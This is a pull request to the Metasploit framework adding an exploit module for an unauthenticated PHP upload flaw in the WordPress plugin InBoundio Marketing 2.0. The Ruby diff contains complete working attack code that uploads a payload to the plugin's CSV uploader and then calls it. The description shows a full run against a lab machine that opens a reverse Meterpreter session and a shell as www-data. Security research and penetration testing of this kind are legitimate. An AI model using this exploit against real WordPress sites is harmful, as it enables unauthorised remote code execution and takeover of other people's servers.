### PR TITLE
Add WordPress InBoundio Marketing File Upload

### DIFF
--- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res
       if res.code == 200 && res.body =~ /#{php_pagename}/
-        print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+        print_good("#{peer} - Our payload is at: #{php_pagename}.")
         register_files_for_cleanup(php_pagename)
       else
         fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")

--- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb
@@ -1,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress InBoundio Marketing Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress InBoundio Marketing
+        version 2.0. The vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'KedAns-Dz', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '36478'],
+          ['OSVDB', '119890'],
+          ['WPVDB', '7864']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['InBoundio Marketing 2.0', {}]],
+      'DisclosureDate' => 'Mar 24 2015',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('inboundio-marketing', '2.0.3')
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+
+    data = Rex::MIME::Message.new
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_pagename}\"")
+    post_data = data.to_s
+
+    res = send_request_cgi(
+      'uri'       => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'csv_uploader.php'),
+      'method'    => 'POST',
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => post_data
+    )
+
+    if res
+      if res.code == 200 && res.body =~ /#{php_pagename}/
+        print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+        register_files_for_cleanup(php_pagename)
+      else
+        fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+      end
+    else
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
+    print_status("#{peer} - Calling payload...")
+    send_request_cgi(
+      'uri'       => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_pagename)
+    )
+  end
+end


### PR DESCRIPTION
#### Add Wordpress Plugin InBoundio Marketing File Upload Vulnerability.

  Application: Wordpress Plugin 'InBoundio Marketing' 2.0
  Homepage: https://wordpress.org/plugins/inboundio-marketing/
  Source Code: https://downloads.wordpress.org/plugin/inboundio-marketing.2.0.zip
  References: https://wpvulndb.com/vulnerabilities/7864
#### Vulnerable packages*

  2.0
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use exploit/unix/webapp/wp_inboundio_marketing_file_upload 
msf exploit(wp_inboundio_marketing_file_upload) > show options 

Module options (exploit/unix/webapp/wp_inboundio_marketing_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   InBoundio Marketing 2.0


msf exploit(wp_inboundio_marketing_file_upload) > info

       Name: Wordpress InBoundio Marketing Upload Vulnerability
     Module: exploit/unix/webapp/wp_inboundio_marketing_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-03-24

Provided by:
  KedAns-Dz
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   InBoundio Marketing 2.0

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress 
  InBoundio Marketing version 2.0. The vulnerability allows for 
  arbitrary file upload and remote code execution.

References:
  http://www.exploit-db.com/exploits/36478
  http://www.osvdb.org/119890
  https://wpvulndb.com/vulnerabilities/7864

msf exploit(wp_inboundio_marketing_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_inboundio_marketing_file_upload) > exploit 

[*] Started reverse handler on 192.168.1.37:4444 
[+] 192.168.1.31:80 - Our payload is at: yNwDcuwRwxdCM.php. Calling payload...
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:50526) at 2015-04-23 03:22:04 -0300
[+] Deleted yNwDcuwRwxdCM.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 28010 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```
